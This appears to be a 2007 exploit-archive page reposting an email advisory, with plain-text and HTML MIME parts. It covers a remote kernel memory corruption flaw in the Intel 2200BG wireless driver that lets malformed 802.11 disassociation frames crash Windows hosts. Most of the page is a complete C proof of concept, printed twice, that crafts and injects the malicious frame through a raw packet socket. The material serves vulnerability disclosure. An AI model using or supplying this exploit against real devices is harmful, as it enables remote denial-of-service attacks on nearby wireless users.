Home / exploits intel-dos.txt
Posted on 27 January 2007
------=_Part_72042_24806074.1169818557157 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption Description: The intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote memory corruption flaw. Malformed disassociation packets can be used to corrupt internal kernel structures, causing a denial of service (BSOD) This vulnerability was found at Intel 2200 driver version 9.0.3.9 (09/12/2005). Driver files: w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725 w29mlres.dll 35afeccc4092b69f62d757c4707c74e9 w29NCPA.dll 980f58b157baedc23026dd9302406bdd Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org) Proof Of Concept: #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <asm/types.h> #include <linux/if.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/if_arp.h> #include <netinet/in.h> #include <stdlib.h> #include <string.h> #include <stdio.h> // 28 bytes disassociation packet. char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal 0x00, 0x00, // Duration ID 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id 0x00, 0x00, // Frag. Number 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code int main() { struct sockaddr_ll link; struct ifreq iface; int s; char packet[sizeof(d)]; int len = 0; if((s=socket(PF_INET, SOCK_DGRAM, 0))<0) return 0; bzero(&iface,sizeof(iface)); bzero(&link,sizeof(link)); bzero(packet,sizeof(d)); strcpy(iface.ifr_name,"ath0raw"); if(ioctl(s,SIOCGIFHWADDR, &iface)) { return 0; } if(ioctl(s,SIOCGIFINDEX, &iface)) { return -1; } if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) { return -1; } link.sll_family = AF_PACKET; link.sll_ifindex = iface.ifr_ifindex; if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) { return -1; } memcpy(packet,d,sizeof(d)); len = sendto(s,packet,sizeof(d), 0, NULL, 0); usleep(5000); printf("%d bytes enviados ",len); close(s); return 0; } ------=_Part_72042_24806074.1169818557157 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline <p>Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p> <p>Description: The intel wireless mini-pci driver provided with Intel<br>2200BG cards is vulnerable to a remote memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD) </p> <p>This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).</p> <p>Driver files:</p> <p>w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll 980f58b157baedc23026dd9302406bdd</p> <p>Author: Breno Silva Pinto ( <a href="http://Sekure.org">Sekure.org</a> ) / bsilva[at]sekure[dot]org)<br> </p> <p>Proof Of Concept:</p> <p>#include <unistd.h><br>#include <sys/types.h><br>#include <sys/socket.h><br>#include <sys/ioctl.h><br>#include <asm/types.h><br>#include <linux/if.h><br>#include <linux/if_packet.h> <br>#include <linux/if_ether.h><br>#include <linux/if_arp.h><br>#include <netinet/in.h><br>#include <stdlib.h><br>#include <string.h><br>#include <stdio.h></p> <p>// 28 bytes disassociation packet.</p> <p>char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal<br> 0x00, 0x00, // Duration ID<br> 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br> 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr <br> 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br> 0x00, 0x00, // Frag. Number<br> 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p> <p>int main() {<br> struct sockaddr_ll link;<br> struct ifreq iface;<br> int s;<br> char packet[sizeof(d)];<br> int len = 0;</p> <p> if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)<br> return 0;</p> <p> bzero(&iface,sizeof(iface));<br> bzero(&link,sizeof(link));<br> bzero(packet,sizeof(d));</p> <p> strcpy(iface.ifr_name,"ath0raw");</p> <p> if(ioctl(s,SIOCGIFHWADDR, &iface)) {<br> return 0;<br> }<br> <br> if(ioctl(s,SIOCGIFINDEX, &iface)) {<br> return -1;<br> }</p> <p> if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {<br> return -1;<br> }</p> <p> link.sll_family = AF_PACKET;<br> link.sll_ifindex = iface.ifr_ifindex;<br> <br> if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {<br> return -1;<br> }</p> <p> memcpy(packet,d,sizeof(d));<br> len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br> usleep(5000); <br> printf("%d bytes enviados ",len);</p> <p> close(s);</p> <p> return 0;<br>}</p> <p> </p> ------=_Part_72042_24806074.1169818557157--